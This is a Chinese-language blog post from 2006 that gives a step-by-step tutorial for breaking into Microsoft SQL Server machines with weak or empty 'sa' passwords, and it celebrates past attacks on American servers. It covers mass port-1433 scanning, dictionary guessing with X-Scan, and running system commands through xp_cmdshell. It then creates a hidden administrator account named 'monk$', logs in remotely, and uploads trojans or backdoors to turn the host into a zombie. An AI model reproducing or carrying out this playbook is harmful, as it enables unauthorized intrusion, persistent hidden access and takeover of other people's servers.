您的位置:首页 > 数据库

sql弱口令入侵

2006-09-16 10:50 288 查看
sql弱口令入侵
mssql服务器sa用户弱口令入侵是及其经典的一种黑客入侵手法。
其成名是在中美黑客大战的时候,我们的前辈利用它入侵了很多美国鬼子的服务器。下面我介绍一下这种入侵的详细情况。
基础知识:
我们在安装mssql服务器之后,系统会有个默认的帐号sa,而这个帐号默认又是空密码。最要命的是这个sa级别的用户几乎等同于系统用户中的administrators,而且mssql有个xp_cmdshell扩展存储功能,这玩意使得我们通过mssql合法的语句就可以调用cmd来执行dos命令。于是灾难来了。
入侵:
工具:s(快速扫描端口工具,命令行下的),xsacn(安焦出品的服务器扫描软件),sqltools(sql综合利用工具),木马或者后门一个
众所周知,mssql服务器的特征端口是1433(我见过BT的网管改过它的默认端口,但大部分管管还是正常人,嘻嘻)
于是第一步:
用s大面积扫描开放1433端口的活动主机。
(在安装xp sp2之后,s之类的并发线程很大的扫描工具不能正常使用,可以在其他操作系统环境下扫描,或者用肉鸡扫)
第二步:
把扫描结果保存为文本,并处理成一行一个ip的格式
第三步:
使用xsacn,载入扫描主机列表文件(就是第二步保存的文本),配置好字典(xscan自带有一套),在扫描选项里只勾选sql弱口令,开始扫描。
(大面积扫描不建议挂载十分复杂的字典,注意这是弱口令,所以使用常规字典就可以,加快速度)
第四步:
喝杯茶,看会电视,唱唱歌,去溜达一圈。等着扫描报告吧。
xsacn扫描完成后会自动生成扫描报告,里面有详细结果。
第五步:
利用sql综合利用工具连接上面得到的弱口令主机。先看看能不能使用dos命令
以下是一部分常用的命令
dir c:/                       //浏览c盘
type c:/boot.ini               //显示boot.ini的内容,用于查看操作系统类型与版本
ver                           //功能同上
net start                       //查看系统启动的服务
netstat -na                     //查看端口开发情况
net user                         //查看当前系统用户情况
net user monk$ monk /add           //添加一个名为monk$密码为monk的用户
net localgroup administrators monk$ /add   //将monk$用户加入管理组
为什么要建立monk$这样一个用户呢?因为用户名后面带 $符号后,管理员使用:net user 看不到,但缺点就是在管理面板中可以看到。(强一点的隐藏方法是帐号克隆,这里就不说了)
如果我们发现服务器的 终端服务:terminal service是开放的,对方又是2000或者2003服务器,那么我们可以直接添加用户,远程登陆。
如果没有终端,或者终端不开放。那我们可以使用上传功能,把我们的后门或者木马上传上去,运行。
这样就简单得拿到一台肉鸡了。 
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息